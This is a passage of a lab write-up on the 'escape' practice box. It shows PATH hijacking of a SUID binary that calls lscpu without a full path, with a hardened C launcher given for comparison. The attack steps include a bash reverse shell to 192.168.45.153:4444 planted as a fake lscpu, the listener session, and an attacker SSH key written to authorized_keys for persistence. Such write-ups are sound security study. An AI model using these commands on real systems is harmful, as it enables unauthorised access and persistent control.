tom


There is a custom SUID binary, /usr/bin/logconsole, that has some commands baked into it with their absolute path, except for the lscpu command, which is invoked without specifying its full path.

This means the binary relies on the PATH environment variable, which it inherits from the caller, to locate and execute lscpu. As a result, an attacker can potentially exploit this by modifying PATH so that a directory they control, holding their own lscpu, is searched before /usr/bin. This technique, known as PATH hijacking, allows arbitrary code to run whenever lscpu is called, potentially leading to privilege escalation or other security risks.
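For comparison, a hardened way for a SUID program to launch such a helper, as an added example that is not the logconsole binary's own code: the command name is resolved only against a fixed list of trusted directories (an assumed list), and the child gets a fixed environment instead of the caller's PATH, so a writable directory prepended to PATH has no effect.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Trusted directories searched instead of the caller's PATH (assumed list). */
static const char *const TRUSTED_DIRS[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };
/* Fixed environment for the child; the caller's PATH and LD_* variables are dropped. */
static char *const SAFE_ENV[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

/* Resolve a bare command name against trusted directories only.
 * Returns 0 with the absolute path in out, -1 if the name is rejected
 * (empty or containing '/'), -2 if no executable was found. */
int resolve_trusted(const char *name, const char *const *dirs, char *out, size_t outlen)
{
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return -1;                         /* accept a name, never a path */
    for (size_t i = 0; dirs[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", dirs[i], name);
        if (n < 0 || (size_t)n >= outlen)
            continue;                      /* truncated: skip it */
        if (access(out, X_OK) == 0)
            return 0;
    }
    return -2;
}

/* Run a trusted helper with the fixed environment; returns its exit status,
 * or -1 if it could not be resolved or started. */
int run_trusted(const char *name)
{
    char path[4096];
    if (resolve_trusted(name, TRUSTED_DIRS, path, sizeof path) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { path, NULL };
        execve(path, argv, SAFE_ENV);      /* absolute path + fixed envp */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Menu option 6 would then be `run_trusted("lscpu")`; a caller who exports PATH=/var/tmp:$PATH still gets the lscpu from the trusted directories.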

Debian-snmp@escape:/var/tmp$ echo -n 'bash -c "bash -i >& /dev/tcp/192.168.45.153/4444 0>&1"' > /var/tmp/lscpu; chmod 755 /var/tmp/lscpu

Setting up a malicious lscpu in /var/tmp and making it executable by anyone

Debian-snmp@escape:/var/tmp$ export PATH=/var/tmp:$PATH

Altering the current PATH variable to start with the /var/tmp directory

Debian-snmp@escape:/var/tmp$ /usr/bin/logconsole
/usr/bin/logconsole
 
 
 /$$                                                                       /$$          
| $$                                                                      | $$          
| $$  /$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$  /$$$$$$$   /$$$$$$$  /$$$$$$ | $$  /$$$$$$ 
| $$ /$$__  $$ /$$__  $$ /$$_____/ /$$__  $$| $$__  $$ /$$_____/ /$$__  $$| $$ /$$__  $$
| $$| $$  \ $$| $$  \ $$| $$      | $$  \ $$| $$  \ $$|  $$$$$$ | $$  \ $$| $$| $$$$$$$$
| $$| $$  | $$| $$  | $$| $$      | $$  | $$| $$  | $$ \____  $$| $$  | $$| $$| $$_____/
| $$|  $$$$$$/|  $$$$$$$|  $$$$$$$|  $$$$$$/| $$  | $$ /$$$$$$$/|  $$$$$$/| $$|  $$$$$$$
|__/ \______/  \____  $$ \_______/ \______/ |__/  |__/|_______/  \______/ |__/ \_______/
               /$$  \ $$                                                                
              |  $$$$$$/                                                                
               \______/                                                                 
 
                                                                                                                                         
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit 
99. Generate the Report 
 
Enter the option ==> 6
6

Executing the SUID binary and selecting option 6, which invokes the lscpu command

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 45148
tom@escape:/var/tmp$ whoami               whoami
whoami
tom
tom@escape:/var/tmp$ hostname             hostname
hostname
escape
tom@escape:/var/tmp$ ip a                 ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:7eff:fed3:9c0e/64 scope link 
       valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::9034:d7ff:fe75:cf89/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:76:59 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
       valid_lft forever preferred_lft forever

Lateral movement to the tom user on the escape host via PATH hijacking of a SUID binary

tom@escape:/home/tom$ mkdir -p ~/.ssh; echo -n 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ ssh tom@$IP              
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-124-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
 System information disabled due to load higher than 1.0
 
 
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
 
14 packages can be updated.
10 updates are security updates.
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
$ 

Upgrading the reverse shell to a proper SSH session as tom using the added authorized key